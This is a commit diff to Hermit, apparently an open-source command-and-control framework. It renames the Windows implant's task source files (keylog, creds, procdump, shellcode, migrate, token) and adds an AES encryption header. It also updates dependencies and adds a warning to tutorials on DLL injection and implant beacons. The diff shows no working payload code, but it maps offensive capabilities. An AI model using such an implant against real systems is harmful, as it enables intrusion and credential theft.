update task format to JSON

README.md

@@ -20,8 +20,8 @@ I'm developing this for my learning purpose.
 
 ## Warning
 
-This project can be used for educational purpose only.  
-It's prohibited to use it on systems which is not under your control.
+- This project can be used for educational purpose only. It's prohibited to use it on systems which is not under your control.
+- I'm a crypto amateur so I cannot guarantee that the implementation of the encryption is not vulnerable.
 
 <br />
 

docs/tutorials/simple-dll-injection.md

@@ -1,5 +1,9 @@
 # Simple DLL Injection
 
+⚠️ **Due to major updates to the project, this tutorial may contain slightly inaccurate information. Please wait for a while until it is updated.**
+
+---
+
 In this tutorial, we generate a stager that loads our DLL implant into another process on Windows victim machine. Then make the C2 agent to communicate with our C2 server.   
 
 Assume that you've completed [the Simple Implant Beacon tutorial](./simple-implant-beacon.md).  

docs/tutorials/simple-implant-beacon.md

@@ -1,5 +1,9 @@
 # Simple Implant Beacon
 
+⚠️ **Due to major updates to the project, this tutorial may contain slightly inaccurate information. Please wait for a while until it is updated.**
+
+---
+
 This page introduces the basic usage of execute the implant beacon on Windows victim machine.  
 
 Assume that you've already installed Hermit.  

go.mod

@@ -7,13 +7,14 @@ require (
 	github.com/briandowns/spinner v1.23.0
 	github.com/chzyer/readline v1.5.1
 	github.com/fatih/color v1.16.0
-	github.com/gin-gonic/autotls v1.0.0
 	github.com/gin-gonic/gin v1.9.1
 	github.com/google/uuid v1.4.0
 	github.com/gorilla/websocket v1.5.1
 	github.com/manifoldco/promptui v0.9.0
+	github.com/mattn/go-shellwords v1.0.12
 	github.com/mattn/go-sqlite3 v1.14.22
 	github.com/rodaine/table v1.1.1
+	golang.org/x/term v0.17.0
 	golang.org/x/text v0.14.0
 	google.golang.org/grpc v1.61.1
 	google.golang.org/protobuf v1.32.0
@@ -42,9 +43,7 @@ require (
 	golang.org/x/arch v0.3.0 // indirect
 	golang.org/x/crypto v0.19.0 // indirect
 	golang.org/x/net v0.21.0 // indirect
-	golang.org/x/sync v0.6.0 // indirect
 	golang.org/x/sys v0.17.0 // indirect
-	golang.org/x/term v0.17.0 // indirect
 	google.golang.org/genproto/googleapis/rpc v0.0.0-20231106174013-bbf56f31fb17 // indirect
 	gopkg.in/yaml.v3 v3.0.1 // indirect
 )

go.sum

@@ -30,8 +30,6 @@ github.com/gabriel-vasile/mimetype v1.4.2 h1:w5qFW6JKBz9Y393Y4q372O9A7cUSequkh1Q
 github.com/gabriel-vasile/mimetype v1.4.2/go.mod h1:zApsH/mKG4w07erKIaJPFiX0Tsq9BFQgN3qGY5GnNgA=
 github.com/gin-contrib/sse v0.1.0 h1:Y/yl/+YNO8GZSjAhjMsSuLt29uWRFHdHYUb5lYOV9qE=
 github.com/gin-contrib/sse v0.1.0/go.mod h1:RHrZQHXnP2xjPF+u1gW/2HnVO7nvIa9PG3Gm+fLHvGI=
-github.com/gin-gonic/autotls v1.0.0 h1:ej32INxMNcgGqETkMlGv+vJM2+cu1oLmuMxndsU3D+c=
-github.com/gin-gonic/autotls v1.0.0/go.mod h1:Cdcp4ZsK4SYzYCJ3ojyAku0ldDa1RWLh24N4M9DEMJk=
 github.com/gin-gonic/gin v1.9.1 h1:4idEAncQnU5cB7BeOkPtxjfCSye0AAm1R0RVIqJ+Jmg=
 github.com/gin-gonic/gin v1.9.1/go.mod h1:hPrL7YrpYKXt5YId3A/Tnip5kqbEAP+KLuI3SUcPTeU=
 github.com/go-playground/assert/v2 v2.2.0 h1:JvknZsQTYeFEAhQwI4qEt9cyV5ONwRHC+lYKSsYSR8s=
@@ -73,6 +71,8 @@ github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWE
 github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
 github.com/mattn/go-runewidth v0.0.15 h1:UNAjwbU9l54TA3KzvqLGxwWjHmMgBUVhBiTjelZgg3U=
 github.com/mattn/go-runewidth v0.0.15/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
+github.com/mattn/go-shellwords v1.0.12 h1:M2zGm7EW6UQJvDeQxo4T51eKPurbeFbe8WtebGE2xrk=
+github.com/mattn/go-shellwords v1.0.12/go.mod h1:EZzvwXDESEeg03EKmM+RmDnNOPKG4lLtQsUlTZDWQ8Y=
 github.com/mattn/go-sqlite3 v1.14.22 h1:2gZY6PC6kBnID23Tichd1K+Z0oS6nE/XwU+Vz/5o4kU=
 github.com/mattn/go-sqlite3 v1.14.22/go.mod h1:Uh1q+B4BYcTPb+yiD3kU8Ct7aC0hY9fxUwlHK0RXw+Y=
 github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q=
@@ -111,8 +111,6 @@ golang.org/x/crypto v0.19.0 h1:ENy+Az/9Y1vSrlrvBSyna3PITt4tiZLf7sgCjZBX7Wo=
 golang.org/x/crypto v0.19.0/go.mod h1:Iy9bg/ha4yyC70EfRS8jz+B6ybOBKMaSxLj6P6oBDfU=
 golang.org/x/net v0.21.0 h1:AQyQV4dYCvJ7vGmJyKki9+PBdyvhkSd8EIx/qb0AYv4=
 golang.org/x/net v0.21.0/go.mod h1:bIjVDfnllIU7BJ2DNgfnXvpSvtn8VRwhlsaeUTyUS44=
-golang.org/x/sync v0.6.0 h1:5BMeUDZ7vkXGfEr1x9B4bRcTH4lpkTkpdh0T/J+qjbQ=
-golang.org/x/sync v0.6.0/go.mod h1:Czt+wKu1gCyEFDUtn0jG5QVvpJ6rzVqr5aXyt9drQfk=
 golang.org/x/sys v0.0.0-20181122145206-62eef0e2fa9b/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
 golang.org/x/sys v0.0.0-20220310020820-b874c991c1a5/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/sys v0.0.0-20220704084225-05e143d24a9e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=

payload/win/implant/CMakeLists.txt

@@ -50,7 +50,9 @@ set(SOURCE_ASM
 )
 
 set(SOURCE_CORE
+        src/core/crypt.cpp
         src/core/handler.cpp
+        src/core/parser.cpp
         src/core/procs.cpp
         src/core/socket.cpp
         src/core/state.cpp
@@ -66,41 +68,42 @@ set(SOURCE_CORE
         src/core/system/user.cpp
         src/core/technique/injection/dll_injection.cpp
         src/core/technique/injection/shellcode_injection.cpp
-        src/core/tasks/cat.cpp
-        src/core/tasks/cd.cpp
-        src/core/tasks/connect.cpp
-        src/core/tasks/cp.cpp
-        src/core/tasks/creds.cpp
-        src/core/tasks/dll.cpp
-        src/core/tasks/download.cpp
-        src/core/tasks/env.cpp
-        src/core/tasks/execute.cpp
-        src/core/tasks/group.cpp
-        src/core/tasks/history.cpp
-        src/core/tasks/ip.cpp
-        src/core/tasks/keylog.cpp
-        src/core/tasks/kill.cpp
-        src/core/tasks/killdate.cpp
-        src/core/tasks/ls.cpp
-        src/core/tasks/migrate.cpp
-        src/core/tasks/mkdir.cpp
-        src/core/tasks/mv.cpp
-        src/core/tasks/net.cpp
-        src/core/tasks/procdump.cpp
-        src/core/tasks/ps.cpp
-        src/core/tasks/pwd.cpp
-        src/core/tasks/reg.cpp
-        src/core/tasks/rm.cpp
-        src/core/tasks/rmdir.cpp
-        src/core/tasks/rportfwd.cpp
-        src/core/tasks/runas.cpp
-        src/core/tasks/screenshot.cpp
-        src/core/tasks/shellcode.cpp
-        src/core/tasks/sleep.cpp
-        src/core/tasks/token.cpp
-        src/core/tasks/upload.cpp
-        src/core/tasks/user.cpp
-        src/core/tasks/whoami.cpp
+        src/core/task/cat.cpp
+        src/core/task/cd.cpp
+        src/core/task/connect.cpp
+        src/core/task/cp.cpp
+        src/core/task/creds.cpp
+        src/core/task/dll.cpp
+        src/core/task/download.cpp
+        src/core/task/env.cpp
+        src/core/task/execute.cpp
+        src/core/task/group.cpp
+        src/core/task/history.cpp
+        src/core/task/ip.cpp
+        src/core/task/jitter.cpp
+        src/core/task/keylog.cpp
+        src/core/task/kill.cpp
+        src/core/task/killdate.cpp
+        src/core/task/ls.cpp
+        src/core/task/migrate.cpp
+        src/core/task/mkdir.cpp
+        src/core/task/mv.cpp
+        src/core/task/net.cpp
+        src/core/task/procdump.cpp
+        src/core/task/ps.cpp
+        src/core/task/pwd.cpp
+        src/core/task/reg.cpp
+        src/core/task/rm.cpp
+        src/core/task/rmdir.cpp
+        src/core/task/rportfwd.cpp
+        src/core/task/runas.cpp
+        src/core/task/screenshot.cpp
+        src/core/task/shellcode.cpp
+        src/core/task/sleep.cpp
+        src/core/task/token.cpp
+        src/core/task/upload.cpp
+        src/core/task/user.cpp
+        src/core/task/whoami.cpp
         src/core/utils/convert.cpp
         src/core/utils/random.cpp
         src/core/utils/split.cpp

payload/win/implant/include/core/crypt.hpp

@@ -0,0 +1,44 @@
+#ifndef HERMIT_CORE_CRYPT_HPP
+#define HERMIT_CORE_CRYPT_HPP
+
+#include <windows.h>
+#include <iomanip>
+#include <string>
+#include <sstream>
+#include <vector>
+
+#include "core/stdout.hpp"
+#include "core/utils.hpp"
+
+#define AES_KEY_LENGTH 16
+#define AES_IV_LENGTH 16
+
+namespace Crypt
+{
+    struct AES
+    {
+        BYTE key[AES_KEY_LENGTH];
+        BYTE iv[AES_IV_LENGTH];
+    };
+
+    struct CRYPT
+    {
+        AES aes;
+    };
+
+    typedef CRYPT* PCRYPT;
+
+    VOID GenerateKeyAndIV();
+    // For Strings
+    std::wstring HexEncode(const std::wstring& wStr);
+    std::wstring HexDecode(const std::wstring& wHex);
+    std::wstring Encrypt(const std::wstring& wPlaintext);
+    std::wstring Decrypt(const std::wstring& wCiphertext);
+    // For Binary Data
+    std::string HexEncodeData(const std::vector<char>& data);
+    std::vector<char> HexDecodeData(const std::string& sHex);
+    std::string EncryptData(const std::vector<char>& plaindata);
+    std::vector<char> DecryptData(const std::string& cipherdata);
+}
+
+#endif // HERMIT_CORE_CRYPT_HPP

payload/win/implant/include/core/handler.hpp

@@ -2,11 +2,17 @@
 #define HERMIT_CORE_HANDLER_HPP
 
 #include "core/task.hpp"
+#include "core/crypt.hpp"
+#include "core/json.hpp"
+#include "core/parser.hpp"
 #include "core/procs.hpp"
 #include "core/state.hpp"
+#include "core/stdout.hpp"
 #include "core/system.hpp"
 #include "core/utils.hpp"
 
+using json = nlohmann::json;
+
 namespace Handler
 {
 	VOID HTTPInit(State::PSTATE pState);